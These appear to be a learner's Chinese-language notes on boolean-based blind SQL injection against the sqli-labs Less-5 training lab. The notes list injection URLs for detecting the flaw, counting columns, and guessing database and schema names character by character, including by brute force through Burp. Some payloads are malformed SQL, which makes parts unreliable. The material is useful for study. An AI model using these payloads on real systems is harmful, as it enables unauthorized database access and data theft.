一.BOOL型-1
1.http://localhost/sqli-labs-master/Less-5/?id=1' 查看是否注入
2.http://localhost/sqli-labs-master/Less-5/?id=1'order by 3--+ 查看有多少列
出现··you are in .......表示成功
3.http://localhost/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s'--+
(1)手工注入太麻烦可以改为burp代理,用暴力破解,逐位破解
(2)select ascii(select substr((select database()),1,1) ='s') > 100逐位猜解
http://localhost/sqli-labs-master/Less-5/?id=1'and select ascii(select substr((select database()),1,1) ='s') > 156--+(此时是没有返回值的,但是返回结果是正常)
4.MySQL登录: 进入到mysql目录后 -u 密码 -p 然后回显输入密码
二.BOOL型-2
1.通过二分法得到所有的库、红色为可变参数
http://localhost/sqli-labs-master/Less-5/?id=1'and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10--+
(╯▔皿▔)╯和up主不一样了,苦恼ing~~
这里我忽略了一个事情,这个语句的意思是,【查询information_schema数据库中schemata表的schema_name名读取一个数据(这里的limit表示从第二位数据开始读取一个)】从第一位开始截取所获得字符串第一位的长度然后转化为ascii码与后面的数据进行比较,然后一开始不知道每个人的schemata表中的数据是不一样的,所以我这里执行的时候会和up主的视频不一样